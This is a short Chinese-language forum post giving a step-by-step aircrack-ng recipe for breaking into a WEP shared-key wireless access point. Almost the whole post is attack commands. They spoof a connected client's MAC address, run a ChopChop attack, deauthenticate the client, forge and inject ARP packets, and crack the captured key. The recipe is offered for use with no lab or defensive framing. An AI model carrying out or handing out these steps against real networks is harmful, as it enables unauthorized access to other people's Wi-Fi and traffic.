WEP Share
![[汗]](/static/emoticons/u6c57.png)
这个真心比较麻烦,赶脚累不爱.一般情况下我们都是破解WEP开放认证的AP是秒破.这个单纯的伪客户端连接无效.必须有客户端.单纯的ARP注入也没有起色.PS:(如果你有不同意见和指教,欢迎回帖).
airmon-ng start wlan0 12
airodump-ng -c 12 mon0
获得客户端MAC后,Kill掉airodump-ng进程,移除mon0 airmon-ng stop mon0.然后
先ifconfig wlan0 down 关掉自己的网卡,进行下一步
利用Macchanger修改自己网卡MAC和目标AP客户端一致
再ifconfig wlan0 up 启用自己的客户端
airmon-ng start wlan0 12
airodump-ng -w xxx -c 12 mon0
aireplay-ng -1 0 -a AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC)
mon0 开始一直提示share key 什么什么的,抱歉,老夫上了三次剑桥少儿英语初级,都没毕业成功..TnT 等到后面几步会让这里生效的
aireplay-ng -4 -b AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC) mon0 ChopChop攻击,现在这一步也不会生效.稍后就会生效
aireplay-ng -0 1 -a AP_MAC -c Client_MAC mon0 Deautenticate 冲突模式攻击一次,-0 后面的1代表一次,可自行看情况更改.
回到ChopChop命令窗口,看到已经有数据包产生,y确定.
然后
packetforge-ng -0 -a AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC)
-k 255.255.255.255 -l 255.255.255.255 -y (ChopChop产生的两个数据包,一个cap,一个xor.选择xor).xor -w arp
aireplay-ng -2 -r arp mon0 开始注入加工过的数据包
aireplay-ng -3 -b AP_MAC -h Client_MAC(也就是现在我们上面更改为目标客户端的MAC)
mon0 你懂得,这样可以速度更快.
aircrack-ng -z CrackMe.cap
: )